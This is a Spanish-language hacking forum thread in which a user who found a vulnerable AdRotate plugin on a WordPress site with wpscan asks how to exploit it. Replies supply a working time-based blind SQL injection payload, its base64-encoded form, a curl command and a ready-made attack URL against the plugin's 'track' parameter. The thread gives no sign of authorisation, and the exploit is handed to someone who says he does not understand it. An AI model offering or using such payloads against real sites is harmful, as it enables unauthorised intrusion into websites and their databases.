comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Duda] Wordpress vulnerable sql

  • 6 Respuestas
  • 2033 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado TheBlack

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Agosto 20, 2013, 01:26:09 pm »
Buenas , hola a todos ! (Perdona si el post no va en el sitio adecuado )

Pues tenia una duda con una inyección sql en wordpress. Analizando con wpscan veo que hay un plugin vulnerable . En el wpscan me sale esto :

*Title:Adrotate plugin <= 3.6.5 SQL Injection Vulnerability
*Reference: http:www.exploit-db.com/exploits/18114/

En la pagina de exploit-db me sale el codigo vulnerable pero realmente no se que hacer con eso , si alguien me puede echar una mano o pasarme algun tutorial para leer e informarme se lo agradeceria
« Última modificación: Agosto 27, 2014, 08:59:42 pm por Expermicid »

Desconectado hielasangre

  • *
  • Underc0der
  • Mensajes: 128
  • Actividad:
    6.67%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Agosto 20, 2013, 02:35:58 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Buenas , hola a todos ! (Perdona si el post no va en el sitio adecuado )

Pues tenia una duda con una inyección sql en wordpress. Analizando con wpscan veo que hay un plugin vulnerable . En el wpscan me sale esto :

*Title:Adrotate plugin <= 3.6.5 SQL Injection Vulnerability
*Reference: http:www.exploit-db.com/exploits/18114/

En la pagina de exploit-db me sale el codigo vulnerable pero realmente no se que hacer con eso , si alguien me puede echar una mano o pasarme algun tutorial para leer e informarme se lo agradeceria


payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
encoded=`echo -n "1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#" | base64 -w 0`
curl No tienes permisos para ver links. Registrate o Entra con tu cuenta$encoded

es facil la vulnerabilidad esta en la variable track. ahi inyecta el payload encodeado en base64


Desconectado TheBlack

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Agosto 20, 2013, 03:01:54 pm »
Me puedes hacer un pequeño tutorial si no es mucha molestia , es que ahora no entiendo nada

Conectado arthusu

  • *
  • Underc0der
  • Mensajes: 549
  • Actividad:
    13.33%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • Ver Perfil
    • Arthusu BLOG
  • Skype: arthusuxD
« Respuesta #3 en: Agosto 20, 2013, 04:00:14 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Me puedes hacer un pequeño tutorial si no es mucha molestia , es que ahora no entiendo nada
O tambien podrias ponerte a estudiar sqli para que entiendas ese payload ;)

Desconectado hielasangre

  • *
  • Underc0der
  • Mensajes: 128
  • Actividad:
    6.67%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Agosto 20, 2013, 04:15:17 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Me puedes hacer un pequeño tutorial si no es mucha molestia , es que ahora no entiendo nada
O tambien podrias ponerte a estudiar sqli para que entiendas ese payload ;)

jajaja tenia planeado decir lo mismo pero no quería ser duro xD

Desconectado TheBlack

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #5 en: Agosto 20, 2013, 04:34:14 pm »
Perdon no se me ha ententido muy bien , eh parecido un poco lammer xD, decia algun tutorial o por donde comenzar para aprender .

Desconectado TUNOVATO

  • *
  • Underc0der
  • Mensajes: 21
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #6 en: Agosto 27, 2013, 03:18:23 am »
saludos compa;

haz lo siguiente:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj

No tienes permisos para ver links. Registrate o Entra con tu cuenta.AQUITUWEB.com/wp-content/plugins/adrotate/adrotate-out.php?track= <-- AQUI ESTO:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj
ESTO:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj
ES ESTO:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#

lo cual esta encodeado en based64


si no entendistes como funciona.....  vas a tener que leeerrr y mucho..... o mejor te dedicas a otras cosas...  :o


saludos;
« Última modificación: Agosto 27, 2013, 03:21:00 am por TUNOVATO »

 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] Duda con " "

Iniciado por Krisium

Respuestas: 1
Vistas: 1728
Último mensaje Junio 10, 2010, 10:50:35 am
por Xa0s
[SOLUCIONADO] [Taller PHP] Duda taller php 1 ejercicio 2

Iniciado por arthusu

Respuestas: 3
Vistas: 1912
Último mensaje Julio 18, 2011, 02:20:03 am
por arthusu
[SOLUCIONADO][Taller PHP] Duda taller php 2 ejercicio 2

Iniciado por Only

Respuestas: 3
Vistas: 1947
Último mensaje Agosto 05, 2011, 09:48:09 pm
por Only
[SOLUCIONADO] Duda con Windows 7 de 32 bits & 64 bits

Iniciado por andrestoushit

Respuestas: 2
Vistas: 907
Último mensaje Marzo 15, 2016, 04:01:16 pm
por Lah-Vahn
[SOLUCIONADO] [Taller PHP] Duda taller php 1 ejercicio 4

Iniciado por arthusu

Respuestas: 2
Vistas: 1641
Último mensaje Julio 18, 2011, 07:19:33 pm
por arthusu